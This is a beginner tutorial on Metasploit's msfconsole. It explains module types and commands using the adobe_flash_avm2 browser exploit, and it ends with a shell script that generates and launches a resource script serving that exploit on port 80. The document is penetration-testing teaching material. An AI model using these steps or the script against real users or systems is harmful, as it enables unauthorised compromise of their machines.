The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
Metasploit is the world’s leading exploitation framework. It is used, to some extent, by nearly every hacker/pentester. As such, you really need to become familiar with it if you want to enter and prosper in this burgeoning field.
Metasploit has multiple interfaces, including:
(1) msfconsole – an interactive command-line interface, and the one this tutorial uses
(2) msfcli – a one-shot Linux command-line interface (removed from the framework in 2015; the same job is now done with msfconsole -x "commands")
(3) Armitage – a third-party GUI front end
(4) msfweb – a browser-based interface (no longer shipped with the framework)
Before we start Metasploit, we should start the PostgreSQL database. Metasploit will run without it, but the database is where it stores the hosts, services, vulnerabilities, credentials and loot you collect while scanning and exploiting, and in older releases it also cached module metadata so that searches ran faster.
Start the PostgreSQL database before starting Metasploit by typing:
kali > service postgresql start
On a systemd-based Kali the equivalent is systemctl start postgresql, and on a fresh install you run msfdb init once first so that the msf database and user exist. Once the database has been started, you can start the Metasploit Framework console by typing:
kali > msfconsole
Inside the console, db_status confirms that the framework is connected to the database.
Although Metasploit is a very powerful exploitation framework, just a few commands can get you started hacking just about any system.
Metasploit has six (6) types of modules:
(1) exploits – modules that take advantage of a vulnerability
(2) payloads – the code that runs on the target after a successful exploit
(3) auxiliary – scanners, fuzzers, sniffers and other modules that do not deliver a payload
(4) post – modules run on a system after it has already been compromised
(5) encoders – modules that re-encode a payload, for instance to avoid bad characters
(6) nops – modules that generate no-operation sleds for padding
A word about terminology before we start. In Metasploit terminology, an exploit is a module that takes advantage of a system or application vulnerability. It usually will attempt to deliver a payload to the system. This payload can be a simple command shell or the all-powerful Meterpreter. The payload is the code that runs on the target; the piece on your side that catches its connection back is called a handler or listener. I will do a tutorial on each of these types of modules in the near future.
Let’s take a look at some of those keyword commands. We can get a list of commands by typing help.
msf > help
msf > use
The “use” command loads a module. So, for instance, if I wanted to load the exploit/windows/browser/adobe_flash_avm2 module (this is an exploit that takes advantage of one of the many vulnerabilities in the Adobe Flash plug-in), I would type:
msf > use exploit/windows/browser/adobe_flash_avm2
The prompt changes to show the loaded module. From there, info prints the module’s description, targets and references, show options lists what it needs to run, and back unloads it.
msf > search
As a newcomer to Metasploit, the “search” command might be the most useful. When Metasploit was small and new, it was relatively easy to find the right module you needed. Now, with over 3000 modules, finding just the right module can be time-consuming and problematic, and search has become a time- and life-saver.
Although you can use search with a bare keyword, that approach is not always efficient: a bare term is matched against every module’s name and description and will often return a VERY large result set.
To be more specific in your search, you can use the following keywords.
platform – the operating system the module is built for, such as windows or linux
type – the type of module: exploit, auxiliary, post, payload, encoder or nop
name – if you know (part of) the name of the module, you can search by its name
Other useful keywords are cve and edb, which match a module’s CVE or Exploit-DB references, and author.
The syntax is the keyword followed by a colon and then a value, such as:
msf > search type:exploit
For instance, if you were looking for an exploit (type) for Windows (platform) for Adobe Flash, you could type:
msf > search type:exploit platform:windows flash
msf > set
This command is used to set options within the module you have selected. For instance, if we run show options after loading the module, we see numerous options that must be set, such as SRVHOST, SRVPORT and URIPATH (for a browser exploit these describe the web server Metasploit will stand up to serve the exploit). We can set any of these with the set command, such as:
msf > set SRVPORT 80
This changes the default SRVPORT (server port) from 8080 to 80. Note that binding a port below 1024 requires running as root (or the CAP_NET_BIND_SERVICE capability). Values given with set apply only to the currently loaded module; setg sets a value globally so it carries over to the next module you load.
msf > unset
This command, as you might expect, removes the value you set, so the module falls back to its default (unsetg does the same for global values). For example:
msf > unset SRVPORT
msf > exploit
Once we have loaded our exploit and set all the necessary options, the final action is “exploit” (run is an alias). For a server-side exploit this sends the exploit to the target system; for a browser module such as adobe_flash_avm2 it starts the malicious web server on SRVHOST:SRVPORT and waits for a victim to browse to it. If successful, the payload runs on the target and you get a session, which sessions -l lists and sessions -i <id> attaches to. Where a module implements it, check tests whether the target is vulnerable without firing the exploit, and exploit -j runs the exploit as a background job so you keep the console.
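The steps above (start the database, load the module, set its options, exploit) can be replayed from a resource script, a plain file of console commands that msfconsole runs with -r. Below is an added example, not code from the original page or from the Metasploit project: a shell script that writes such a resource script for the session described above, refuses to bind a privileged port without root, starts PostgreSQL, and hands the file to msfconsole. The module and option names (exploit/windows/browser/adobe_flash_avm2, SRVHOST, SRVPORT, URIPATH) are the ones used on this page; the script path /tmp/flash_avm2.rc and the values for SRVHOST and URIPATH are assumptions.

```shell
#!/usr/bin/env bash
# Added example, not from the original page: drive the msfconsole session
# described above (database, use, set, exploit) with a resource script that
# msfconsole replays via -r. Module and option names are the page's own; the
# output path and the SRVHOST/URIPATH values are assumptions.
set -eu

# build_rc MODULE [NAME=VALUE]...  -> prints the console commands for the script
build_rc() {
  module="$1"; shift
  printf 'use %s\n' "$module"
  for kv in "$@"; do
    case "$kv" in
      *=*) printf 'set %s %s\n' "${kv%%=*}" "${kv#*=}" ;;
      *)   printf 'bad option "%s" (expected NAME=VALUE)\n' "$kv" >&2; return 1 ;;
    esac
  done
  printf 'show options\n'
  printf 'exploit -j\n'    # -j runs the exploit as a background job
}

# needs_root [NAME=VALUE]...  -> 0 when SRVPORT or LPORT is a privileged port
needs_root() {
  for kv in "$@"; do
    case "$kv" in
      SRVPORT=*|LPORT=*)
        port="${kv#*=}"
        case "$port" in
          ''|*[!0-9]*) printf 'bad port "%s"\n' "$port" >&2; return 2 ;;
        esac
        if [ "$port" -lt 1024 ]; then return 0; fi ;;
    esac
  done
  return 1
}

# start_db: start PostgreSQL as the page does, preferring the systemd unit
start_db() {
  if command -v systemctl >/dev/null 2>&1; then
    sudo systemctl start postgresql
  else
    sudo service postgresql start
  fi
}

# run_session [RCFILE]: write the script, then start the database and msfconsole
run_session() {
  rc="${1:-/tmp/flash_avm2.rc}"                  # assumed path
  opts="SRVHOST=0.0.0.0 SRVPORT=80 URIPATH=/"    # SRVPORT 80 mirrors the page
  if needs_root $opts && [ "$(id -u)" -ne 0 ]; then
    echo "SRVPORT below 1024 needs root (or CAP_NET_BIND_SERVICE)" >&2
    return 1
  fi
  build_rc exploit/windows/browser/adobe_flash_avm2 $opts > "$rc"
  start_db
  msfconsole -q -r "$rc"
}

# Stand-alone demo: print the script that run_session would hand to msfconsole.
build_rc exploit/windows/browser/adobe_flash_avm2 SRVHOST=0.0.0.0 SRVPORT=80 URIPATH=/
```

Run as-is, the script only prints the generated resource file; call run_session (as root, since SRVPORT 80 is below 1024) to start the database and launch msfconsole with it. The same file can be replayed by hand with msfconsole -q -r /tmp/flash_avm2.rc, and any value in it can still be changed afterwards with set and unset exactly as above.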